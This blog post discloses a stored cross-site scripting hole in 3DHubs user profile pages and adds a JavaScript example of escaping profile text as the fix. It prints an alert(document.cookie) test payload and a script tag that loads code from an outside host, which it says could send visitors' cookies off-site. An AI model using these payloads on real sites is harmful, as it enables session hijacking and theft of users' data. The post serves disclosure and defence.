3DHubs is a community site which allows users to offer 3D-printing services, for money. For tinkerers it allows you to upload a 3D model, and find a person to print it for you, in exchange for money.
As I've recently started using 3D-printed things this is a great resource.
When you register for 3DHubs, as a user or a creator, you get given a public profile-page.
The profile page displays text that the user has written without performing any kind of escaping. So for example I wrote on my profile text:
<script>alert(document.cookie);</script>
As expected this raised an alert-box with lots of content.
Stealing content was pretty easy, just include a malicious script:
<script src="https://steve.fi/t.js"></script>
That script could make requests for off-site images, with the cookies submitted as parameters.
Fixing this hole should be pretty simple, just filter and escape the user-content.
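One way to apply the fix described above, shown as an added example that is not 3DHubs' code or part of the original post: escape every user-controlled profile field at output time. The function names and the profile markup are assumptions; the two sample inputs are the profile texts quoted in this post.

```javascript
// Added example: escapeHtml, renderProfileUnsafe and renderProfileSafe are
// hypothetical names, and the markup is an assumed profile template.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Encode every character that can change HTML parsing state, so user text
// stays text in both element content and quoted attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern described in the post: profile text is concatenated
// into the page without escaping.
function renderProfileUnsafe(user) {
  return `<div class="profile"><h1>${user.name}</h1><p>${user.bio}</p></div>`;
}

// Hardened form: each user-controlled field is escaped when it is written out.
function renderProfileSafe(user) {
  return `<div class="profile"><h1>${escapeHtml(user.name)}</h1>` +
         `<p>${escapeHtml(user.bio)}</p></div>`;
}

// Constructed sample input using the two profile texts quoted in the post.
const samples = [
  { name: "tester", bio: "<script>alert(document.cookie);</script>" },
  { name: "tester", bio: '<script src="https://steve.fi/t.js"></script>' },
];

// Render each sample both ways and report whether a live <script> tag survives.
function demo() {
  return samples.map((u) => ({
    unsafeHasScriptTag: renderProfileUnsafe(u).includes("<script"),
    safeHasScriptTag: renderProfileSafe(u).includes("<script"),
    safeHtml: renderProfileSafe(u),
  }));
}

console.log(demo());
```

Escaping belongs at the point of output, so text already stored in profiles is rendered harmlessly without rewriting the database.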
Vendor notified: May 4th 2017 via Twitter
Fixed: ??